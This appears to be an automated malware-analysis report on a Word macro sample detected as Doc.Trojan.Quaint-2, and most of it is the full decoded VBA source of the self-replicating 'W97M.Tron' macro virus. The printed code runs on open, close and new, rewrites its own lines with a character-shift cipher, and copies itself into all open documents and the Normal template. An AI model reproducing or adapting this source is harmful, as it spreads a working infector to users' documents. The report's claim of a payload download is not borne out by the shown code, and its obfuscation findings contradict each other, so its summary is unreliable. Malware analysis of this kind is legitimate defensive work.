MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, including a Document_Open macro that runs when the document is opened. The VBA code is obfuscated and attempts to download and execute a secondary payload, as indicated by the ClamAV detection 'Doc.Trojan.Quaint-2'. The macro also attempts to set the project description to 'W97M.Tron by e[ax] / Species VL', which is included as an IOC.
Heuristics 3
- ClamAV: Doc.Trojan.Quaint-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Quaint-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2228 bytes |

SHA-256: a4ed02acbe8df22ee196cdd13c13d095371fa6b411116ac3c3d63c8706aef8fe
Detection: ClamAV: Doc.Trojan.Quaint-2
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Tron Private Sub Document_Open(): On Error Resume Next: Dim x, c: j = j + 1 Dim linKoda2, s If Left(ThisDocument.VBProject.vbcomponents(1).codemodule.lines(33, 1), 1) = "'" Then For E = 33 To 34 desni = Right(ThisDocument.VBProject.vbcomponents(1).codemodule.lines(E, 1), _ (Len(ThisDocument.VBProject.vbcomponents(1).codemodule.lines(E, 1)) - 1)) ThisDocument.VBProject.vbcomponents(1).codemodule.replaceline E, desni Next For f = 33 To 34 linKoda2 = ThisDocument.VBProject.vbcomponents(1).codemodule.lines(f, 1) For s = 1 To Len(linKoda2) nov = nov & Chr(Asc(Mid(linKoda2, s)) + 3) Next ThisDocument.VBProject.vbcomponents(1).codemodule.replaceline f, nov nov = "" Next Else For f = 33 To 34 linKoda2 = ThisDocument.VBProject.vbcomponents(1).codemodule.lines(f, 1) For s = 1 To Len(linKoda2) nov = nov & Chr(Asc(Mid(linKoda2, s)) - 3) Next ThisDocument.VBProject.vbcomponents(1).codemodule.replaceline f, "'" & nov nov = "" Next End If For t = 1 To Documents.Count If Documents(t).VBProject.vbcomponents(j).codemodule.lines(j, j) <> "'Tron" Then linKoda = ThisDocument.VBProject.vbcomponents(j).codemodule.lines(j, ThisDocument.VBProject.vbcomponents(j).codemodule.countoflines) With Documents(t).VBProject.vbcomponents(j).codemodule If .lines(j, j) <> "'Tron" Then '+abibqbifkbp g) +`lrkqlcifkbp '+^aacoljpqofkd ifkHla^ ActiveDocument.VBProject.Description = "W97M.Tron by e[ax] / Species VL" End If End With End If Next Set norm = NormalTemplate If norm.VBProject.vbcomponents(j).codemodule.lines(j, j) <> "'Tron" Then With norm.VBProject.vbcomponents(j).codemodule trm = Trim$(ThisDocument.VBProject.vbcomponents(j).codemodule.lines(j, ThisDocument.VBProject.vbcomponents(j).codemodule.countoflines)): .deletelines 
j, .countoflines: .addfromstring trm End With End If End Sub Private Sub Document_Close(): Document_Open: End Sub Private Sub Document_New(): Document_Open: End Sub |